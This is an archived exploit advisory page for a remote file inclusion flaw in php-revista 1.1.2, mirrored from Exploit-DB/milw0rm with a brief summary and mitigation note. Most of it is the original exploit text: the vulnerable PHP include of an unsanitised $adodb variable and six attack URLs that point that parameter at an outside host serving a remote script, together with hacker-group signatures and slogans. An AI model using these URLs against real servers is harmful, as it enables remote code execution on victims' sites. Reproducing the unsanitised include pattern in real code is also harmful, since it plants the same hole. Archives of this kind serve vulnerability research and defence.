php-revista - exploit.company

vendor:

php-revista

by:

CoLd Zero

N/A

CVSS

HIGH

Remote File Include

CWE

Product Name: php-revista

Affected Version From: php-revista <= 1.1.2

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2006

php-revista <= 1.1.2 (index.php) Remote File Include Vulnerability

The php-revista version 1.1.2 is vulnerable to remote file inclusion. An attacker can include arbitrary files from a remote server, which can lead to remote code execution.

Mitigation:

Update to a patched version of php-revista that fixes the vulnerability. Remove any unnecessary file inclusion statements.

Source

Exploit-DB raw data:

--------------------------------------||    Viva Palestine  ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien  ||-----------------------------------------


php-revista <= 1.1.2 (index.php) Remote File Include Vulnerability


Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");

            A_mal Hackeing Team _ Hacking



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

######################################################
#
#            php-revista 1.1.2
#
# Class:     Remote File Include Vulnerability
# Published  2006-12-3
# Remote:    Yes
# Type:      high
# Site:
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################
<?

include ("$adodb");
$obten_rev="select max(id_revista) as id from revista where terminada=1";
$obten = $DB->execute("$obten_rev");
$id_revista = $obten->fields["id"];

======================================================

Exploit :

Http://www.Victem.0/[php-revista_PaTH]/estilo/Digital_Multiplex/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/discreet/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/galveston/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/mergedidea/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/Shadow_Boxer/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/Widget_Factory/index.php?adodb=http://4azhar.com/soft.txt?

======================================================




----  GreeTz: [MoHaNdKo]  [Cold One]  [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
             [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[  Everyone I know


****************************************************************
# *www.4azhar.com Securty Team    >>      www.4azhar.com        *
# *SpeciaL PoweR SecuritY Team    >>      www.specialpower.org  *
# *A_mal Hacking Team             >>      -vv -l -p The-Pradise *
*****************************************************************


http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


--------------------------------------||    Viva Palestine  ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien  ||-----------------------------------------


# milw0rm.com [2006-12-03]